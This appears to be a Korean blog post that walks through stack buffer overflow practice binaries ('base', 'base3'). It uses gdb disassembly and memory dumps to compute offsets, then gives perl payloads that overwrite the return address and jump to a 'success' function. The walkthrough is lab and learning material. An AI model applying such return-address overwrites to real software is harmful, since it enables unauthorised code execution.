'stackoverflow'에 해당되는 글 1건
- 2008.06.19 stack overflow 1
base 풀이 1
[root@localhost tmp]# gdb base
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) i fun
All defined functions:
Non-debugging symbols:
0x08048278 _init
0x080482a0 __libc_start_main
0x080482b0 printf
0x080482c0 exit
0x080482d0 strcpy
0x08048304 call_gmon_start
0x08048328 __do_global_dtors_aux
0x08048364 frame_dummy
0x08048390 success
0x080483a8 main
0x080483fc __libc_csu_init
0x0804842c __libc_csu_fini
0x08048460 __do_global_ctors_aux
0x08048484 _fini
(gdb) disas main
Dump of assembler code for function main:
0x080483a8 <main+0>: push %ebp
0x080483a9 <main+1>: mov %esp,%ebp
0x080483ab <main+3>: sub $0x18,%esp
0x080483ae <main+6>: and $0xfffffff0,%esp
0x080483b1 <main+9>: mov $0x0,%eax
0x080483b6 <main+14>: sub %eax,%esp
0x080483b8 <main+16>: cmpl $0x1,0x8(%ebp)
0x080483bc <main+20>: jg 0x80483c8 <main+32>
0x080483be <main+22>: sub $0xc,%esp
0x080483c1 <main+25>: push $0x0
0x080483c3 <main+27>: call 0x80482c0 <exit>
0x080483c8 <main+32>: sub $0x8,%esp
0x080483cb <main+35>: mov 0xc(%ebp),%eax
0x080483ce <main+38>: add $0x4,%eax
0x080483d1 <main+41>: pushl (%eax)
0x080483d3 <main+43>: lea 0xffffffe8(%ebp),%eax
0x080483d6 <main+46>: push %eax
0x080483d7 <main+47>: call 0x80482d0 <strcpy>
0x080483dc <main+52>: add $0x10,%esp
0x080483df <main+55>: sub $0x8,%esp
0x080483e2 <main+58>: lea 0xffffffe8(%ebp),%eax
0x080483e5 <main+61>: push %eax
0x080483e6 <main+62>: push $0x80484bb
---Type <return> to continue, or q <return> to quit---
0x080483eb <main+67>: call 0x80482b0 <printf>
0x080483f0 <main+72>: add $0x10,%esp
0x080483f3 <main+75>: mov $0x0,%eax
0x080483f8 <main+80>: leave
0x080483f9 <main+81>: ret
0x080483fa <main+82>: nop
0x080483fb <main+83>: nop
End of assembler dump.
(gdb)
(gdb) disas success
Dump of assembler code for function success:
0x08048390 <success+0>: push %ebp
0x08048391 <success+1>: mov %esp,%ebp
0x08048393 <success+3>: sub $0x8,%esp
0x08048396 <success+6>: sub $0xc,%esp
0x08048399 <success+9>: push $0x80484a8
0x0804839e <success+14>: call 0x80482b0 <printf>
0x080483a3 <success+19>: add $0x10,%esp
0x080483a6 <success+22>: leave
0x080483a7 <success+23>: ret
End of assembler dump.
(gdb)
success 의 주소 값 0x08048390
(gdb) b *main+52 // strcpy 까지 break point 설정후
Breakpoint 1 at 0x80483dc
(gdb) r aaaaaaaaaaaaaaaaaaa // 실행
Starting program: /tmp/base aaaaaaaaaaaaaaaaaaa
Breakpoint 1, 0x080483dc in main ()
(gdb) x/10wx $esp // esp값을 기준으로 메모리 값 덤프
0xbfffe420: 0xbfffe430 0xbffffba5 0xbfffe438 0x0804828d
0xbfffe430: 0x61616161 0x61616161 0x61616161 0x61616161
0xbfffe440: 0x00616161 0x40015360
// aaaa 값이 bfffe430을 기준으로 쌓여 있는 것을 볼 수 있다.
(gdb) x/10wx $ebp
0xbfffe448: 0xbfffe468 0x42015574 0x00000002 0xbfffe494
ret sfp argc argv
0xbfffe458: 0xbfffe4a0 0x4001582c 0x00000002 0x080482e0
0xbfffe468: 0x00000000 0x08048301
//ebp값을 기준으로 확인해 보면 ret sfp argc argv
//값이 나열 된 것을 볼 수 있다.
memory 구조상
stack 구조는
---------------
ret
---------------
sfp
ebp->---------------<-esp
지역변수
..
..
으로 되어 있는데
함수 호출 과정을 거친후 리턴 될때 ebp값을 읽어 eip에 저장된 다음
명령어를 실행한다.
strcpy 같은 함수의 취약점은 byte체크를 하지 않는다.
이때 원하는 양의 문자열을 perl 스크립트 같은 스키립트 를 이요하여
스택을 넘어 ret공간에다 원하는 명령이나 메모리 주소를 덮어 씌워
쉘코드를 실행 시킬수 있다.
암튼 이 구조상으로 보면
지역 변수의 공간이 차지 하는 공간은
sub $0x18,%esp 에서 보듯이 24byte의 공간을 차지 하고 있다.
여기에 sfp공간 값 4byte를 더해 ret 주소에 success함수의 주소값을 집어넣어야 하므로
28byte만큰 overflow를 시키면 된다.
success 함수의 시작값0x08048390 에 aaaa*?의 수를 주어야 한다.
# ./base `perl -e 'print "a"x28,"\x90\x83\x04\x08"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaa릡
You're Success!!!
세그멘테이션 오류
success함수가 실행 되었다.
base3 풀이
[root@localhost tmp]# gdb base3
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) i fun
All defined functions:
Non-debugging symbols:
0x08048278 _init
0x080482a0 __libc_start_main
0x080482b0 printf
0x080482c0 exit
0x080482d0 strcpy
0x08048304 call_gmon_start
0x08048328 __do_global_dtors_aux
0x08048364 frame_dummy
0x08048390 success
0x080483a8 main
0x08048420 __libc_csu_init
0x08048450 __libc_csu_fini
0x08048484 __do_global_ctors_aux
0x080484a8 _fini
(gdb) disas main // main 함수 를 까뒤집어 보자
Dump of assembler code for function main:
0x080483a8 <main+0>: push %ebp
0x080483a9 <main+1>: mov %esp,%ebp
0x080483ab <main+3>: sub $0x368,%esp
0x080483b1 <main+9>: and $0xfffffff0,%esp
0x080483b4 <main+12>: mov $0x0,%eax
0x080483b9 <main+17>: sub %eax,%esp
0x080483bb <main+19>: sub $0xc,%esp
0x080483be <main+22>: push $0x80484dc
0x080483c3 <main+27>: call 0x80482b0 <printf>
0x080483c8 <main+32>: add $0x10,%esp
0x080483cb <main+35>: cmpl $0x1,0x8(%ebp)
0x080483cf <main+39>: jg 0x80483eb <main+67>
0x080483d1 <main+41>: sub $0xc,%esp
0x080483d4 <main+44>: push $0x80484e1
0x080483d9 <main+49>: call 0x80482b0 <printf>
0x080483de <main+54>: add $0x10,%esp
0x080483e1 <main+57>: sub $0xc,%esp
0x080483e4 <main+60>: push $0x0
0x080483e6 <main+62>: call 0x80482c0 <exit>
0x080483eb <main+67>: sub $0x8,%esp
0x080483ee <main+70>: mov 0xc(%ebp),%eax
0x080483f1 <main+73>: add $0x4,%eax
0x080483f4 <main+76>: pushl (%eax)
---Type <return> to continue, or q <return> to quit---
0x080483f6 <main+78>: lea 0xfffffea8(%ebp),%eax
0x080483fc <main+84>: push %eax
0x080483fd <main+85>: call 0x80482d0 <strcpy>
0x08048402 <main+90>: add $0x10,%esp
0x08048405 <main+93>: sub $0x8,%esp
0x08048408 <main+96>: lea 0xffffff78(%ebp),%eax
0x0804840e <main+102>: push %eax
0x0804840f <main+103>: push $0x80484ee
0x08048414 <main+108>: call 0x80482b0 <printf>
0x08048419 <main+113>: add $0x10,%esp
0x0804841c <main+116>: leave
0x0804841d <main+117>: ret
0x0804841e <main+118>: nop
0x0804841f <main+119>: nop
End of assembler dump.
(gdb) disas success
Dump of assembler code for function success:
0x08048390 <success+0>: push %ebp
0x08048391 <success+1>: mov %esp,%ebp
0x08048393 <success+3>: sub $0x8,%esp
0x08048396 <success+6>: sub $0xc,%esp
0x08048399 <success+9>: push $0x80484cc
0x0804839e <success+14>: call 0x80482b0 <printf>
0x080483a3 <success+19>: add $0x10,%esp
0x080483a6 <success+22>: leave
0x080483a7 <success+23>: ret
End of assembler dump.
0x08048390
success 함수의 시작 주소가 보인다!
또한 main+85에 strcpy가 보인다.!!
(gdb) b *main+90 //strcpy까지 실행 시켜보기 위해 breakpoint를 걸었다.
Breakpoint 1 at 0x8048402
(gdb) r aaaaaaaaaaaaaaaaaaaaaaaaaa // 실행
Starting program: /tmp/base3 aaaaaaaaaaaaaaaaaaaaaaaaaa
hi~
Breakpoint 1, 0x08048402 in main ()
(gdb) x/10wx $esp
0xbfffe140: 0xbfffe360 0xbffffb9d 0x0804959c 0x40015a38
0xbfffe150: 0x00000000 0x400169e0 0xd0cac37d 0x00001707
0xbfffe160: 0x00000000 0x01000000
(gdb)
0xbfffe168: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffe178: 0x00000000 0x00000000 0x00000001 0x00000000
0xbfffe188: 0x00000000 0x00000000
(gdb)
0xbfffe190: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffe1a0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffe1b0: 0x00000006 0x400169e0
(gdb)
0xbfffe1b8: 0x000fffff 0x00000051 0x00000000 0x00000000
0xbfffe1c8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffe1d8: 0x00000000 0x00000000
(gdb)
0xbfffe1e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffe1f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffe200: 0x00000000 0x00000000
(gdb)
0xbfffe208: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffe218: 0x00000000 0x4000fbce 0x00000000 0x00000000
0xbfffe228: 0x40001001 0x4001582c
(gdb)
0xbfffe230: 0x40015a34 0x00020414 0xbfffe468 0x4000eeaf
0xbfffe240: 0x08048034 0x00000006 0xbfffe27c 0x00000000
0xbfffe250: 0x00000000 0x00000000
(gdb)
0xbfffe258: 0x00000000 0x2d000000 0x00000003 0xbfffe302
0xbfffe268: 0x0003fbf9 0x00000000 0x00000000 0x00000006
0xbfffe278: 0x08048034 0x080482e0
(gdb)
0xbfffe280: 0x756e694c 0x00000078 0x00000000 0x00000000
0xbfffe290: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffe2a0: 0x00000000 0x00000000
(gdb)
0xbfffe2a8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffe2b8: 0x00000000 0x00000000 0x636f6c00 0x6f686c61
0xbfffe2c8: 0x6c2e7473 0x6c61636f
(gdb)
0xbfffe2d0: 0x616d6f64 0x00006e69 0x00000000 0x00000000
0xbfffe2e0: 0x4000914d 0x42010c7f 0x42010c7f 0x00000000
0xbfffe2f0: 0x00000000 0x00000020
(gdb)
0xbfffe2f8: 0x42010d36 0x4200bc84 0x42003394 0x400160b0
0xbfffe308: 0x00000003 0x40016350 0x4001582c 0x4001624c
0xbfffe318: 0x4200dba3 0xbfffe3fc
(gdb)
0xbfffe320: 0x40008156 0x4200dba3 0x0ab98982 0x420069e4
0xbfffe330: 0xbfffe3ac 0x40009401 0x080481c9 0x40015c68
0xbfffe340: 0x400093bb 0x4001582c
(gdb)
0xbfffe348: 0x40015a38 0x00000000 0xbfffe390 0x4000914d
0xbfffe358: 0x42010c7f 0x08048216 0x61616161 0x61616161
0xbfffe368: 0x61616161 0x61616161
(gdb)
0xbfffe358:에서 6161이 보인다. 인자로 넣은 a의 asci값
+8
0xbfffe360 에서 시작 되었다.
0xbfffe4b8 - 0xbfffe360 = 0x158 십진수 로 변환하면 344
여기에 sfp공간 값 +4byte를 하면 348이 나온다!
# ./base3 `perl -e 'print "a"x348,"\x90\x83\x04\x08"'`
hi~
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa릡
You're Best!!!
세그멘테이션 오류
success 함수가 실행되었다!
(printf "`perl -e 'printf "a"x??, "\x??\x??\x??"'`;cat) | ./base2
Prev
Rss Feed